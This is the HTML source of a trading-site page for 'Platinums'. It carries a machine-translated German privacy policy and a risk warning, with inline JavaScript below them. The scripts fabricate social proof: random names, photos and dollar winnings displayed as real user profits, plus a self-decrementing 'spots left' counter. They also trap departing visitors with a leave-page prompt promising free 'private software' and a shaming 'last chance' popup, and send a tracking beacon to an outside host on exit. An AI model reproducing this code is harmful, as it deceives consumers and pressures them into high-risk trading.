<!DOCTYPE html>
<html class="wide wow-animation" lang="en">
  <head>
    <!-- Site Title-->
    <title>Platinums</title>
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta charset="utf-8">
    <link rel="icon" href="images/favicon.ico" type="image/x-icon">
    <!-- Stylesheets-->
    <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:300,400,700,900,400italic">
    <link rel="stylesheet" href="css/style.css">
		<!--[if lt IE 10]>
    <div style="background: #212121; padding: 10px 0; box-shadow: 3px 3px 5px 0 rgba(0,0,0,.3); clear: both; text-align:center; position: relative; z-index:1;"><a href="http://windows.microsoft.com/en-US/internet-explorer/"><img src="images/ie8-panel/warning_bar_0000_us.jpg" border="0" height="42" width="820" alt="You are using an outdated browser. For a faster, safer browsing experience, upgrade for free today."></a></div>
    <script src="js/html5shiv.min.js"></script>
		<![endif]-->
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.13/css/all.css" integrity="sha384-DNOHZ68U8hZfKXOrtjWvjxusGo9WQnrNx2sqG0tfsghAvtVlRW3tvkXWZh58N9jp" crossorigin="anonymous">

  </head>
  <body>
    <div class="page-loader">
      <div class="brand-name"><img src="images/logop.svg" alt="" width="133" height="39"/>
      </div>
      <div class="page-loader-body">
        <div class="cssload-jumping"><span></span><span></span><span></span><span></span><span></span></div>
      </div>
    </div>
    <!-- Page-->
    <div class="page"> 
      <!-- Page Header -->
      <header class="page-header">
        <!-- RD Navbar-->
        <div class="rd-navbar-wrap novi-background">
          <nav class="rd-navbar rd-navbar-top-panel-light" data-layout="rd-navbar-fixed" data-sm-layout="rd-navbar-fixed" data-sm-device-layout="rd-navbar-fixed" data-md-layout="rd-navbar-fixed" data-md-device-layout="rd-navbar-fixed" data-lg-device-layout="rd-navbar-fullwidth" data-lg-layout="rd-navbar-fullwidth" data-stick-up-clone="true" data-md-stick-up-offset="90px" data-lg-stick-up-offset="90px" data-stick-up="true" data-sm-stick-up="true" data-md-stick-up="true" data-lg-stick-up="true"> 
            <div class="rd-navbar-inner">
              <!-- RD Navbar Nav-->
              <div class="rd-navbar-nav-wrap">
                <ul class="rd-navbar-nav">
                  <li><a href="index.html#services">Leistungen</a></li>
                  <li><a href="index.html#news">Nachrichten </a></li>
                  <li><a href="index.html#about-us">Über uns</a></li>
                  <li><a href="index.html#testimonials"> Referenzen</a></li>
                </ul>
              </div>
              <!-- RD Navbar Panel-->
              <div class="rd-navbar-panel">
                <button class="rd-navbar-toggle" data-rd-navbar-toggle=".rd-navbar-nav-wrap"><span></span></button>
                <!-- RD Navbar Brand-->
                <div class="rd-navbar-brand"><a class="brand-name" href="index.html"><img src="images/logop.svg" alt="" width="133" height="39"/></a></div>
              </div>
              <!-- RD Navbar Top Panel-->
              <div class="rd-navbar-top-panel">
                <div class="rd-navbar-top-panel-toggle" data-rd-navbar-toggle=".rd-navbar-top-panel"><span></span></div>
                <div class="rd-navbar-top-panel-content"> 
                  <ul class="inline-list-xxs">
                    <!-- <li><a class="icon novi-icon icon-xs icon-gray-6 fa fa-instagram" href="index.html#"></a></li>
                    <li><a class="icon novi-icon icon-xs icon-gray-6 fa fa-facebook" href="index.html#"></a></li>
                    <li><a class="icon novi-icon icon-xs icon-gray-6 fa fa-twitter" href="index.html#"></a></li>
                    <li><a class="icon novi-icon icon-xs icon-gray-6 fa fa-google-plus" href="index.html#"></a></li> -->
                  </ul><a class="btn btn-sm btn-primary btn-effect-ujarak" href="index.html#">sign up</a>
                  <div class="widget widget-people block-hidden first shown">
                      <div class="widget-inner">
                          <div class="content">
                              <div class="img">
                                  <img class="imgface" src="https://randomuser.me/api/portraits/men/43.jpg" alt="">
                              </div>
                              <div class="desc">
                                  <div class="name">
                                      <span class="pname">Tiffany J.</span>gemacht
                                  </div>
                                  <div class="sum">$<span class="pnum">293</span></div>
                              </div>
                          </div>
                      </div>
                  </div>
                 <div class="btn-group" style="cursor: pointer;margin-left:0 !important;"><img src="http://www.countryflags.io/DE/flat/64.png" alt="" class="dropdown-toggle" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                      <ul class="dropdown-menu" style="text-align: center;">
                        <li><a href="../en"><img src="http://www.countryflags.io/GB/flat/64.png" alt=""></a></li>
                        <li><a href="../it"><img src="http://www.countryflags.io/IT/flat/64.png" alt=""></a></li>
                        <li><a href="../es"><img src="http://www.countryflags.io/ES/flat/64.png" alt=""></a></li>
                      </ul>
                    </div>

                </div>
              </div>
            </div>
          </nav> 
        </div>
      </header>

      <!-- Services-->
      <section class="section novi-background bg-image section-lg text-center bg-white" id="services" data-type="anchor">
        <div class="shell">
          <div class="text-page">
   <h1> Datenschutzrichtlinie </h1>
    <p> 1. Pro Speed ​​Tech LTD schätzt Ihre Privatsphäre und Sicherheit und der Schutz Ihrer Privatsphäre gehört zu den obersten Prioritäten. Diese Datenschutzerklärung beschreibt unsere Methode zur Sammlung der Informationen von Website-Nutzern, wie wir diese Informationen verwenden können und wie Sie Ihre Privatsphäre schützen können. </P> <p> Um eine nahtlose und sichere Interaktion mit unserer Website zu gewährleisten Wir setzen Verschlüsselungssysteme und andere Sicherheitsstrategien ein, um alle unsere Website-Aktivitäten zu schützen. Um eine minimale Chance zu gewährleisten, dass jemand anders mit Ihrem Namen handelt, fordern wir Sie auf, Ihren eigenen Benutzernamen und Ihr Passwort unter geschützten Protokollen zu erstellen und zu verwenden. </P> <h3> Passwortsicherheit: </h3> <p> Bemühen Sie sich nicht Ihr Passwort mit einer anderen Person teilen, und beachten Sie, dass Offizielle von Pro Speed ​​Tech LTD niemals verlangen, Ihr Passwort zu kennen. Wenn jemand auf Sie zugeht und behauptet, ein Vertreter von Pro Speed ​​Tech LTD zu sein, und Sie nach Ihrem Passwort fragt, stimmen Sie nicht der Nachfrage zu und melden Sie den Vorfall unverzüglich unserem Kundendienst. Wählen Sie ein schwer zu knackendes Passwort und stellen Sie sicher, dass Sie es alle paar Monate ändern. Vergessen Sie nicht, sich sofort abzumelden, wenn Sie eine Trading-Aktivität mit Pro Speed ​​Tech LTD abgeschlossen haben, nach jeder Handelssitzung und zu jeder Zeit, wenn Sie Ihren Computer verlassen wollen. </P> <p> Wenn Sie mit dem Handeln beginnen wollen, die erste Sache Von Ihnen wird verlangt, ein Konto zu eröffnen. So einfach wie Account-Eröffnung ist, müssen Sie einige grundlegende persönliche Informationen wie Ihren Vor- und Nachnamen, Telefonnummer und E-Mail-Adresse zur Verfügung stellen. Sie müssen möglicherweise nur in der Zukunft weitere Informationen oder Identitätsnachweise angeben. Pro Speed ​​Tech LTD sichert die Privatsphäre aller persönlichen Daten, die wir von Ihnen erhalten, einschließlich Familienstand, Alter oder beruflichen Status. Wir können von Ihnen auch Pass, Fotos und Kopien Ihres Ausweises anfordern, in Übereinstimmung mit allen Gesetzen, Richtlinien oder Vorschriften, die die Beschaffung solcher Dokumente erfordern. An einigen Standorten haben Sie möglicherweise einen gesetzlichen Zwang, finanzielle Informationen, Risikobereitschaft und Anlageerfahrung bereitzustellen. </P> <p> Alle diese Dokumente sind notwendig, wenn Sie einen reibungslosen Zugang zu einem Handelskonto haben möchten mit der Fähigkeit, leicht zu handeln. Beachten Sie, dass Sie diese Dokumente nicht unbedingt bereitstellen müssen. Wenn Sie diese jedoch nicht zur Verfügung stellen, haben Sie keine Möglichkeit, das Konto zu eröffnen und auf der Website zu handeln. Darüber hinaus müssen Sie uns immer benachrichtigen, wenn sich Ihre persönlichen Daten ändern, sodass wir die notwendigen Änderungen vornehmen, um Ihr Profil gemäß den gesetzlichen Bestimmungen auf dem neuesten Stand zu halten. </P> <p> Die von uns gesammelten Informationen dienen der Verwaltung und dem Betrieb von Dienstleistungen, Verteidigung unserer gesetzlichen Rechte, Betrugsprävention und Einhaltung von Vorschriften in Bezug auf die Dienstleistungen, die wir Kunden anbieten. Die Datenschutzrichtlinie von Pro Speed ​​Tech LTD gibt Ihnen die Garantie und Zusicherung, dass Pro Speed ​​Tech LTD Ihre persönlichen Daten nicht mit Ausnahme der oben genannten Zwecke oder des Eintretens der nachfolgenden Bedingungen handelt, vermietet, offen legt oder verkauft. Wir tauschen Daten mit Clearinghäusern und Banken aus, um Ihnen alle Dienstleistungen und Produkte zur Verfügung zu stellen, die Sie für den Handel benötigen, oder mit den Partnerfirmen und anderen Personen, die Ihre persönlichen Daten verarbeiten. </P> <p> Immer wenn ein Verstoß oder Verdacht auf betrügerische Handlungen vorliegt Aktivitäten im Zusammenhang mit der Handelstätigkeit eines Benutzers, werden wir innerhalb der Grenzen der Datenschutzrichtlinie tätig sein, um Ihre privaten Informationen, wie sie für solche Einrichtungen wie Betrugsprävention und Kreditauskunfteien erforderlich sind, offenzulegen. Wir werden Ihre persönlichen Daten in derselben Situation auch den Gerichten und den nationalen und internationalen Strafverfolgungsbehörden zur Verfügung stellen, soweit dies erforderlich und gemäß den gesetzlichen Bestimmungen ist. Abgesehen von diesen Fällen sind Ihre persönlichen Daten in angemessener Weise vor illegaler Verwendung, Änderung, Beschädigung oder Offenlegung durch alle angemessenen Mittel geschützt, während Sie mit Pro Speed ​​Tech LTD handeln. </P> <h2> Datenschutz für Kinder und Minderjährige </h2> <p > Wenn Sie diese Website nutzen, geben Sie an, dass Sie mindestens 18 Jahre alt sind oder aufgrund einer anderen gesetzlichen Altersbeschränkung, die auf anderen für Sie geltenden Gesetzen beruht. Dies ist obligatorisch, wenn Sie Zugriff auf den Handel auf der Website haben möchten. Wenn Sie nicht das erforderliche Mindestalter erreicht haben und Sie irrtümlicherweise Zugriff auf die Website hatten, sind Sie verpflichtet, die Website zu verlassen und uns schnell zu benachrichtigen, damit wir die erforderlichen Vorschriften und Gesetze, die sich auf Sie beziehen, überprüfen Ihre persönlichen Daten. </p> <p> Ungeachtet des oben genannten Szenarios sammeln und speichern wir in dem Bemühen, die Privatsphäre von Kindern zu schützen, nicht bewusst Daten von Nutzern unter 13 Jahren und wir haben kein Element unserer Website gestaltet jemand unter 13 Jahren. Wenn die Website zu irgendeinem Zeitpunkt solche minderjährigen personenbezogenen Daten sammelt oder aufbewahrt, es würde dem COPPA (Children's Online Privacy Protection Act) und allen anderen erforderlichen Gesetzen innerhalb der richtigen Gerichtsbarkeit entsprechen. </p> <h2> Änderungen zu dieser Datenschutzrichtlinie </h2> <p> Gelegentlich können wir Änderungen an dieser Datenschutzerklärung vornehmen. Die aktuellste und verbindlichste Version ist die Version, die sich immer auf der Site befindet. Wenn wir wesentliche Änderungen vornehmen, können wir Sie gemäß unserer Beurteilung per E-Mail benachrichtigen. </P> <p> Bitte beachten Sie, dass jegliche Nutzung der Website und ihrer Dienste den Allgemeinen Geschäftsbedingungen unterliegt und diese möglicherweise erfordern Anpassung gelegentlich im ausschließlichen Besitz von Pro Speed ​​Tech LTD. </p> <h3> 2. Sammlung von persönlichen Informationen </h3> <p> 2.1. Wir sammeln Informationen, die erforderlich sind, um ein Konto zu eröffnen, Geschäfte effektiv zu tätigen und Ihre Vermögenswerte und Ihre Privatsphäre zu schützen. Um dies zu tun, sammeln wir Informationen, die uns helfen, Ihre Bedürfnisse und Vorlieben zu bewerten. </P> <p> 2.2. Die Informationen, die wir direkt von Ihnen sammeln, enthalten Informationen, die für die Kommunikation mit Ihnen benötigt werden, einschließlich Ihres Namens, Ihrer Postanschrift, Telefonnummer, E-Mail-Adresse und um zu identifizieren, wer Sie sind. Wir erfassen auch demografische Informationen, wenn Sie ein Konto eröffnen, einschließlich Geburtsdatum, Ausbildung, Beruf usw. und Informationen über Ihre Transaktionen mit uns. Wir bewerten auch Ihre Handelserfahrung, Ihr ungefähres jährliches Einkommen und ungefähres Reinvermögen, um Ihre finanzielle Position zu beurteilen. </P> <h3> 3. VERWENDUNG VON PERSÖNLICHEN INFORMATIONEN </h3> <p> Wir verwenden personenbezogene Daten nur zur Bereitstellung Sie Qualität Service und Sicherheit. Zum Beispiel können wir die von Ihnen gesammelten Informationen verwenden, um Ihre Identität und Kontaktinformationen zu überprüfen. Wir können diese Informationen auch dazu verwenden, Ihr Handelskonto einzurichten und einzurichten, eine Kontonummer und ein sicheres Passwort zu vergeben, Ihre Kontoaktivitäten zu verwalten und Sie mit Kontoinformationen zu kontaktieren. Diese Informationen helfen uns, unsere Dienstleistungen für Sie zu verbessern, Ihre Browser-Erfahrung anzupassen und Sie über zusätzliche Produkte, Dienstleistungen oder Werbeaktionen zu informieren, die für Sie von Interesse sein könnten. </P> <h3> 4.Unsere Partner und Partner </h3> <p> Wir können Informationen an Affiliates weitergeben, wenn die Informationen erforderlich sind, um das von Ihnen angeforderte Produkt oder die angeforderte Dienstleistung bereitzustellen, oder um Ihnen die Möglichkeit zu geben, an den von unseren Partnern angebotenen Produkten oder Dienstleistungen teilzunehmen. Wir können auch Partnerschaften und Allianzen eingehen, zu denen auch gemeinsame Marketingverträge gehören können, mit anderen Unternehmen, die qualitativ hochwertige Produkte und Dienstleistungen anbieten, die für unsere Kunden von Wert sein könnten. Um sicherzustellen, dass diese Produkte und Dienstleistungen Ihren Bedürfnissen entsprechen und in einer Weise geliefert werden, die nützlich und relevant ist, können wir einige Informationen mit Partnern, Partnern und Allianzen teilen. Dadurch können sie die Angebote, die am relevantesten und nützlichsten sind, besser verstehen. Die Verwendung Ihrer persönlichen Informationen ist auf die Zwecke beschränkt, die in unserer Beziehung mit dem Partner oder Partner angegeben sind. </P>
  </div>

        </div>
      </section>


      <!-- Page Footer-->
      <section class="pre-footer-minimal novi-background bg-gray-dark">
        <div class="pre-footer-minimal-inner">
          <div class="shell text-center text-sm-left">
            <div class="range range-sm-center spacing-55">
              <div class="cell-sm-12 cell-md-12 text-sm-center text-md-center">
   				<h6>Important Risk Note:</h6>
                <p style="font-size: 11px;">
                	Trading in FX and CFDs involves a high risk of loss due to the leveraged nature of the trading which might lead to the total loss of your capital and which might not be appropriate for all types of investors. Please read our full risk warning and the relevant broker you will be registered with to ensure that you understand the risks involved prior to proceeding, taking into consideration your relevant experience. Seek independent advice if necessary. The information contained in this website and disclosure documents is of a general nature only, and does not take into account your personal circumstances, financial situation or needs. You should consider the brokerage Client Agreement carefully, and seek independent advice before deciding whether trading in such products is suitable for you.
                </p>
              </div>
<!--               <div class="cell-sm-4 cell-md-3">
                <h4>Opening Hours</h4>
                <dl class="terms-list-inline">
                  <dt>Weekdays</dt>
                  <dd>08:00am–7:30pm</dd>
                </dl>
                <dl class="terms-list-inline">
                  <dt>Sunday, Saturday</dt>
                  <dd>08:00am–4:00pm</dd>
                </dl>
              </div>
              <div class="cell-sm-4 cell-md-2">
                <h4>Phone</h4>
                <ul class="list-xxs">
                  <li><a class="link link-md" href="tel:#">+1 (409) 987–5874</a></li>
                  <li><a class="link" href="mailto:#">info@demolink.org</a></li>
                </ul>
              </div> 
              <div class="cell-sm-4 cell-md-6">

              </div>-->
            </div>
          </div>
        </div>
        <div class="shell">
          <hr class="gray">
        </div>
      </section>
      <footer class="page-footer-minimal novi-background">
        <div class="shell">
          <p class="rights">Platinums&nbsp;&copy;&nbsp;<span id="copyright-year"></span>.&nbsp; <br class="veil-sm">
            <a class="link-underline" href="#">Datenschutz-Bestimmungen</a>
            <a class="link-underline" href="terms-of-service.html">Nutzungsbedingungen</a>
          </p>
          </p>
        </div>
      </footer>
    </div>
    <!-- Global Mailform Output-->
    <div class="snackbars" id="form-output-global"></div>

    <!-- Javascript-->
    <script src="js/core.min.js"></script>
    <script src="js/script.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/2.1.4/toastr.min.js"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/css/toastr.css">
    <script src="mod.js"></script>
  </body>
</html>
 <script src="https://sdk.accountkit.com/en_US/sdk.js"></script>
 <style>
   #ui-to-top{
        line-height: 2.8;
   }

.block-hidden.shown {
    opacity: 1;
}
.widget-people {
    top: 0;
    right: 0;
}
.block-hidden {
    transition: opacity 0.3s;
    opacity: 0;
}
.widget {
   /* position: fixed;*/
    z-index: 1000;
    width: 222px;
    height: 75px;
    overflow: hidden;
    top: 81px;
    background-color: #78abf196;
}
  .widget-people .content .img img {
      display: inline-block;
      vertical-align: middle;
      max-width: 50px;
      border-radius: 50%;
  }
  .widget-people .content .img {
      width: 50px;
      display: inline-block;
      vertical-align: middle;
      height: 67px;
      line-height: 67px;
      text-align: center;
  }
  .widget-people .content {
    white-space: nowrap;
}
.widget .content {
    font-size: 18px;
    font-weight: normal;
    color: #ffffff;
}
.widget-people .widget-inner {
    padding: 5px 10px 5px 15px;
}
.widget .widget-inner {
    padding: 10px 20px;
}
.widget .content:before, .widget .content:after {
    content: " ";
    display: table;
}

.widget-people .content .desc {
    width: 132px;
    display: inline-block;
    vertical-align: middle;
    font-size: 16px;
    left: 8px;
    position: relative;
}
.widget-people .content .desc .name {
    white-space: nowrap;
    overflow: hidden;
    -ms-text-overflow: ellipsis;
    text-overflow: ellipsis;
    font-size: 12px;
}
.widget-people .content .desc .pname {
    font-weight: 500;
}
.widget-people .content .desc .sum {
    line-height: 1;
    font-weight: 300;
    font-size: 36px;
    font-style: italic;
    white-space: nowrap;
    overflow: hidden;
    -ms-text-overflow: ellipsis;
    text-overflow: ellipsis;
}
.widget-people .content .desc .sum .pnum {
    font-weight: bold;
}
.exit_popup {
  position: fixed;
  z-index: 1500;
  display: none;
  height: 100%;
  overflow: hidden;
  right: -20px;
  left: -20px;
  top: 0;
}
.exit_popup .exit_popup_overlay {
  position: absolute;
  width: 100%;
  height: 100%;
  background-color: #000000;
  opacity: 0.8;
  z-index: 15;
}
.exit_popup .close_button {
  position: absolute;
  right: 30px;
  top: 10px;
  display: inline-block;
  cursor: pointer;
  color: #fa5258;
  opacity: 1;
  text-decoration: none;
  z-index: 20;
  font-size: 44px;
  line-height: 1;
}
@media screen and (max-width:  767px) {
  .exit_popup .close_button {
    font-size: 40px;
  }
}
.exit_popup .close_button:after {
  content: '\f00d';
  font-family: FontAwesome;
  font-weight: normal;
  font-style: normal;
}
.exit_popup .close_button:hover {
  opacity: 0.8;
}
.exit_popup .popup_inner {
  position: absolute;
  left: 0;
  right: 0;
  height: 100%;
  z-index: 16;
  overflow: auto;
  padding: 0 20px;
}
.exit_popup .popup_inner .popup_content {
  margin: 100px auto 0 auto;
  width: 100%;
  max-width: 610px;
  position: relative;
  border-radius: 10px;
  background: none;
}
@media screen and (max-height: 800px) {
  .exit_popup .popup_inner .popup_content {
    margin-top: 50px;
  }
}
@media screen and (max-width:  767px) {
  .exit_popup .popup_inner .popup_content {
    margin-top: 20px;
  }
}
.exit_popup .popup_inner .popup_content .popup_content_inner {
  position: relative;
  text-align: center;
  padding: 20px;
}
.exit_popup .popup_inner .popup_content .popup_content_inner:before,
.exit_popup .popup_inner .popup_content .popup_content_inner:after {
  content: " ";
  display: table;
}
.exit_popup .popup_inner .popup_content .popup_content_inner:after {
  clear: both !important;
  height: 0;
}
* html .exit_popup .popup_inner .popup_content .popup_content_inner {
  position: relative;
  zoom: 1;
}
* + html .exit_popup .popup_inner .popup_content .popup_content_inner {
  position: relative;
  zoom: 1;
}
@media screen and (max-width:  767px) {
  .exit_popup .popup_inner .popup_content .popup_content_inner {
    padding: 20px;
  }
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup-header .title {
  color: #fa5258;
  font-weight: bold;
  font-style: italic;
  font-size: 80px;
  line-height: 1.2;
}
@media screen and (max-width:  767px) {
  .exit_popup .popup_inner .popup_content .popup_content_inner .popup-header .title {
    font-size: 34px;
  }
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup-header .subtitle {
  font-size: 40px;
  font-weight: normal;
  color: #fff;
  line-height: 1.2;
  margin-bottom: 15px;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup-header .subtitle b {
  color: #f7931a;
}
@media screen and (max-width:  767px) {
  .exit_popup .popup_inner .popup_content .popup_content_inner .popup-header .subtitle {
    font-size: 18px;
  }
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form {
  text-align: center;
  width: 100%;
  max-width: 520px;
  margin: 0 auto;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form:before,
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form:after {
  content: " ";
  display: table;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form:after {
  clear: both !important;
  height: 0;
}
* html .exit_popup .popup_inner .popup_content .popup_content_inner .popup_form {
  position: relative;
  zoom: 1;
}
* + html .exit_popup .popup_inner .popup_content .popup_content_inner .popup_form {
  position: relative;
  zoom: 1;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .form-group {
  margin-bottom: 15px;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .control-label,
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form label {
  display: none;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .form-control {
  height: 44px;
  background-color: #e6e6e6;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .buttons {
  position: relative;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .buttons .button {
  width: 100%;
}
.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .buttons .big-button {
  text-transform: capitalize;
}
@media screen and (max-width:  767px) {
  .exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .buttons .big-button {
    font-size: 22px;
  }
}
/*.exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .buttons .big-button:before {
  content: '';
  display: inline-block;
  vertical-align: middle;
  margin-right: 20px;
  background: url(../images/icon-b.png) 0 0 no-repeat;
  width: 39px;
  height: 49px;
  position: relative;
  top: -5px;
}
@media screen and (max-width:  767px) {
  .exit_popup .popup_inner .popup_content .popup_content_inner .popup_form .buttons .big-button:before {
    width: 30px;
    height: 30px;
    background-size: contain;
    top: -2px;
    margin-right: 10px;
  }
}*/
 </style>



<div id="popup" class="exit_popup" style="display: none;">
    <div class="exit_popup_overlay"></div>

    <a class="close_button" style="" onclick="$('#popup').css('display','none');mousebottom = 0;setTimeout(function(){pu=1;},5000);"></a>
    <div class="popup_inner">
        <div class="popup_content">
            <div class="popup_content_inner">

                <div class="popup-content-wrapper">
                    <div class="popup-header">
                        <div class="title">
                            Du hast gerade einen großen Fehler gemacht!



                        </div>
                        <div class="subtitle">
                          
                            Dies ist Ihre  <b>letzte Chance</b> <b><i>Platinums</i></b> beizutreten und Ihre finanzielle Zukunft zu sichern.
                        </div>

                    </div>

                </div>
                <div class="popup-form-wrapper">
                    <form  class="popup_form" name="popform" id="popform">
                        <div class="form-group">
                            <label for="" class="control-label"></label>
                            <input type="text" autocomplete="off" name="name_exit" placeholder="Dein Name" id="name_exit" class="form-control input-email" value="">
                        </div>
                        <div class="form-group">
                            <label for="" class="control-label"></label>
                            <input type="tel" autocomplete="off" name="phone_exit" id="phone_exit" class="form-control input-email" value="">
                        </div>


                        <div class="buttons">
                            <button type="submit" class="button big-button btn btn-primary" onclick="dontMiss()" id="exitsubmit">Jetzt loslegen</button>
                        </div>
                    </form>
                </div>

            </div>

        </div>
    </div>

</div>

<script>
var ot = '0f68b744b1ce8941cb68d151a8c34d35';
var tt = 0;

    //demo only scripts
    function getRandomInt(min, max)
    {
        return Math.floor(Math.random() * (max - min + 1)) + min;
    }

    function dataStart(){

        // get some demo data
        var number = getRandomInt(99, 999),
            wins = new Intl.NumberFormat('en-GB').format(number),
            date = new Date,
            today = date.getDate() + '.' + date.getMonth() + '.' + date.getFullYear(),
            names = ['Levi  A.', 'Levi  B.', 'Levi  C.', 'Levi  D.', 'Levi  E.', 'Levi  F.', 'Levi  G.'],
            name = names[getRandomInt(0, names.length-1)];

        // on success ajax request
        $('.pnum').text(wins);
        $('.pdate').text(today);
        $('.pname').text(name);


        var spots = getRandomInt(2, 20);

        $('.pspots').text(spots);

        setTimeout(function(){$('.block-hidden.first').addClass('shown');}, getRandomInt(1000, 3000));

        setTimeout(function(){$('.block-hidden.secondary').addClass('shown');}, getRandomInt(3000, 6000));

    }









yesyoucan = 1;

window.onunload = window.onbeforeunload = function (evt) {
    var message = '***************************************\n\n W A I T   B E F O R E   Y O U   G O !\n\n       How About I Give My Private software for FREE?\n\n  CLICK THE *CANCEL* BUTTON RIGHT NOW\n     TO STAY ON THE CURRENT PAGE.\n\n***************************************';



    var ni = new Image();
    ni.src = '//awidget.org/stats/welcome.php?ot='+window.ot+'&tick='+window.tt;   

      
    if (typeof evt == "undefined") {
        evt = window.event;
    }
    //console.log('2. ' + yesyoucan);
  if(yesyoucan){
      if (evt) {
          evt.returnValue = message;

      }
      reloadpage();
      return message;

  }

}
onsubmitfix = 1;


var ajaxwork = false;
function reloadpage(){
  var currentdata = {};

  ajaxwork = $.ajax({
    url: "/en/exit-page-body.php?ot=0f68b744b1ce8941cb68d151a8c34d35&offer_id=0&aff_id=0&lang=en",
    success: function(bdy){
      //if(msg.answer=='ok'){

      $('body').empty();
      $('body').append(bdy);
      $('body').addClass('exit-page');

      //fullheightCalc();

//console.log(msg);
      //}
    },
    error: function (xhr, ajaxOptions, thrownError) {

    }
  });//.abort()
}





// exit popup
var mousebottom = 0;
var pu = 0;
setTimeout(function(){pu=1;},5000);

$(document).mousemove(function(e){
    var X = e.pageX;
    var Y = e.pageY;

    //console.log(Y, $(window).scrollTop(), mousebottom, pu);


    if(Y-$(window).scrollTop() > 200)
        mousebottom = 1;

    if(mousebottom == 1  &&  Y-$(window).scrollTop()<15  && !$('body').hasClass('modal')){//  &&&& pu == 1
        $('#popup').css('display', 'block');
        console.log('!PU!');
        mousebottom = 0;
        pu = 0;
        setTimeout(function(){pu=1;},5000);
//alert('!');
    }


});


$(document).ready(function() {

    $('a').click(function() {
        yesyoucan = 0;
      //console.log('1. ' + yesyoucan);
    });


        setTimeout('winners()', rand(100,1000));
      //dataStart();
        setTimeout('copies()', rand(100,1000));
    yesyoucan = 1;
});








function rand(min, max) {
    return Math.floor(Math.random() * (max - min + 1)) + min;
}



function copies(){
    var el = $(".pspots");
    var left = parseInt($(el).html());

    left = left > 5 ? left - rand(1,3) : left - rand(-2,2);
    if(left < 2) {
        $(el).html(1);
    }
    else $(el).html(left);

    /** do new value to element watchers **/
    //$("#watchers").html(rand(701, 1998));
    $('.block-hidden.secondary').addClass('shown');

    setTimeout('copies()', rand(6000,9000));
}

var names = ["", "John", "Melissa", "Tiffany", "Laura", "Brian", "Anthony", "Scott", "Erica"];//  "Amy" ,   , "Laura"  , "Jeffrey"  , "Crystal"  , "Jamie"  , "Mark"  , "Erica"  , "Scott"  , "Jose"  , "Samuel", "Boris"
var cf = 0;
function winners(){
    var name = $(".pname");
    var moneyHolder = $(".pnum");
    var face = $(".imgface");
    var money = parseInt($(moneyHolder).html());
    $(moneyHolder).html(rand(45,400));//+'.'+rand(50,99)
    var n = rand(1,names.length-1);
    var lf = cf;
    /*
    if(jQuery.inArray( n, [3,5,6,7,8] )){
        while(cf == lf)
            lf = [3,5,6,7,8][rand(0,5)];
        cf = lf;
    }
    if(jQuery.inArray( n, [3,5,6,7,8] )){
        while(cf == lf)
            lf = [1,2,4,9,10][rand(0,5)];
        cf = lf;
    }
    */
    //console.log(cf);
    $(name).html(names[n]+' '+"ABCDEFGHIJKLMNOPQRSTUVWXYZ".substr(rand(0,25),1)+'.');
    //cf = 
    face.attr('src', 'images_w/media/0'+n+'.jpg');
    //console.log(face.n);
    $('.block-hidden.first').addClass('shown');
    setTimeout('winners()', rand(70000,100000));
}
//showModal('#risk'); return false;
</script>


<script type="text/javascript">
  // initialize Account Kit with CSRF protection
  AccountKit_OnInteractive = function(){
    AccountKit.init(
      {
        appId:"780200312177398", 
        state:"test", 
        version:"v1.1",
        fbAppEventsEnabled:true,
        debug:true,
        redirect:window.location+'/deposit',
      }
    );
  };

 // login callback
  function loginCallback(response) {
    if (response.status === "PARTIALLY_AUTHENTICATED") {
      var code = response.code;
      var csrf = response.state;
      // Send code to server to exchange for access token
      console.log(response);
      app.do.registration();
    }
    else if (response.status === "NOT_AUTHENTICATED") {
      // handle authentication failure
      console.log(response);
    }
    else if (response.status === "BAD_PARAMS") {
      // handle bad parameters
      //console.log(response);
      toastr.error("Please check phone number!");
      $('[name="phone"]').focus()
    }
  }

   // phone form submission handler
  function smsLogin() {
    if ($('[name="name"]').val()=='' || $('[name="name"]').val().match(/\b\w+\b/g).length<2 ) {
      $('[name="name"]').focus();
      toastr.error("Name not valid!");
      return;
    } else if(!(/^[+a-zA-Z0-9._-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}$/i.test($('[name="email"').val()))){
        toastr.error('Please enter a valid email');
        $('[name="email"').focus();
        return; 
    }else if(!/^[\+]?[(]?[0-9]{3}[)]?[-\s\.]?[0-9]{3}[-\s\.]?[0-9]{4,6}$/im.test($('[name="phone"]').val())){
      $('[name="phone"]').focus();
       toastr.error("Please check phone number!");
      return;
    } else if(!/(?=.*\d)(?=.*[a-z])(?=.*[A-Z]).{5,20}/i.test($('[name="password"]').val())){
    	$('[name="password"]').focus();
       toastr.error("Password must have 5-20 characters, Latin alphabet letters and digits");
       return;
    };
    var phone=$('[name="phone"]').val().substring(getInfo.country_calling_code.length,$('[name="phone"]').val().length);
    var phone_code=$('[name="phone"]').val().substring(0,getInfo.country_calling_code.length);
    var phone_operator=$('[name="phone"]').val().substring(phone_code.length+1,phone_code.length+3);
    var phoneSend=phone.substring(phone_operator.length,phone.length);
    AccountKit.login(
      'PHONE', 
      {countryCode: phone_code, phoneNumber: phone}, // will use default values if not specified
      loginCallback
    );
  }

  // email form submission handler
  // function emailLogin() {
